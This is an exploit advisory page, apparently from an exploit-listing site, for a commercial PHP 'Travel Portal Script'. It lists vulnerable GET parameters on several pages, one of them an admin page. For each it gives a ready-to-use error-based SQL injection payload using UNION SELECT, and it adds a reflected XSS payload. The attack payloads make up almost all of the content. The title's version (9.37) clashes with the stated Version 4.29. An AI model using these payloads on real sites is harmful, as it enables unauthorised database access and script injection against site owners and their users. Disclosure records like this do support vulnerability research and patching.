Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
Unavailable | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2017-02-24 |
Travel Portal Script 9.37 Cross Site Scripting / SQL Injection Exploit Title : Travel Portal Script v9.37 - Multiple Vulnerability Google Dork : - Date : 23/02/2017 Exploit Author : Marc Castejon <[email protected]> Vendor Homepage : http://itechscripts.com/travel-portal-script/ Software Link: http://travel.itechscripts.com/ Type : webapps Platform: PHP Version: 4.29 Sofware Price and Demo : $250 ------------------------------------------------ Type: Error Based Sql Injection Vulnerable URL:http://localhost/[PATH]/holiday.php Vulnerable Parameters: hid Method: GET Payload:-1 UNION ALL SELECT NULL,CONCAT(0x717a6a7171,0x525168516356734869505754574344727766454b6b4a4f4469594a53586572436f424e5961567776,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL-- lRVf ------------------------------------------------ Type: Reflected XSS Vulnerable URL:http://localhost/[PATH]/holiday.php Vulnerable Parameters: hid Method: GET Payload: "/><img src=i onerror=prompt(1)> ------------------------------------------------ Type: Error Based Sql Injection Vulnerable URL:http://localhost/[PATH]/pages.php Vulnerable Parameters: id Method: GET Payload:-1 UNION ALL SELECT NULL,CONCAT(0x717a6a7171,0x525168516356734869505754574344727766454b6b4a4f4469594a53586572436f424e5961567776,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL-- lRVf ------------------------------------------------- Type: Error Based Sql Injection Vulnerable URL:http://localhost/[PATH]/content.php Vulnerable Parameters: id Method: GET Payload:-1 UNION ALL SELECT NULL,CONCAT(0x717a6a7171,0x525168516356734869505754574344727766454b6b4a4f4469594a53586572436f424e5961567776,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL-- lRVf ------------------------------------------------- Type: Error Based Sql Injection Vulnerable URL:http://localhost/[PATH]/hotel.php Vulnerable Parameters: id Method: GET Payload:-1 UNION ALL SELECT NULL,CONCAT(0x717a6a7171,0x525168516356734869505754574344727766454b6b4a4f4469594a53586572436f424e5961567776,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL-- lRVf ------------------------------------------------- Type: Error Based Sql Injection Vulnerable URL:http://localhost/[PATH]/holiday_book.php Vulnerable Parameters: hid Method: GET Payload:-1 UNION ALL SELECT NULL,CONCAT(0x717a6a7171,0x525168516356734869505754574344727766454b6b4a4f4469594a53586572436f424e5961567776,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL-- lRVf ------------------------------------------------ Type: Error Based Sql Injection Vulnerable URL:http://localhost/[PATH]/admin/airline-edit.php Vulnerable Parameters: fid Method: GET Payload:-1 UNION ALL SELECT NULL,CONCAT(0x717a6a7171,0x525168516356734869505754574344727766454b6b4a4f4469594a53586572436f424e5961567776,0x7162706271),NULL,NULL,NULL,NULL,NULL,NULL-- lRVf ------------------------------------------------
Copyright ©2024 Exploitalert.